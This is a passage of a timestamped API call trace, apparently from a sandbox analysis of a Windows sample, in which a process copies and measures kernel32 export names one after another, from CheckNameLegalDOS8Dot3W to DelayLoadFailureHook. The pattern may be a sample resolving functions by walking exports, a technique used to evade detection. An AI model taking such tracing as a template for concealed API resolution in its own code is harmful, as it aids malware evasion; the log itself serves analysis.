returned="CheckNameLegalDOS8Dot3W" [0185.614] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.614] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.614] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.614] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.614] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.614] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.614] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.614] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.615] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.615] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.615] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.615] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.615] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.615] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.615] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.615] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.615] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.615] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.615] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.615] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.615] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.615] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.615] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.615] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.615] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.615] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.615] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.615] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.616] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.616] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.616] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.616] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.616] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.616] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.616] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.616] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.616] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.616] lstrlenA (lpString="COPYFILEA") returned 9 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.616] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.616] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.616] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.616] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.616] lstrlenA (lpString="COPYFILEW") returned 9 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.616] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.616] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.616] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.616] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.617] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.617] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.617] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.617] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.617] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.617] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.617] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.617] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.617] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.617] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.617] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.617] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.617] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.618] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.618] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.618] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.618] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.618] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.618] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.618] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.618] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.618] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.618] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.618] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.619] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.619] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.619] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.619] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.619] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.619] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.619] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.619] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.619] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.619] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.619] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.619] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.619] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.619] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.619] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.619] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.619] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.619] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.619] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.620] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.620] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.620] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.620] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.620] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.620] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.620] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.620] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.620] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.620] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.620] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.620] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.620] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.620] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.620] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.620] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.620] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.620] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.620] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.620] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.621] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.621] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.621] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.621] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.621] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.621] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.621] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.621] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.621] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.621] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.621] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.621] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.621] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.621] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.621] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.621] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.621] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.621] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.621] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.622] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.622] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.622] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.622] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.622] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.622] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.622] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.622] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.622] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.622] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.622] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.622] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.622] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") 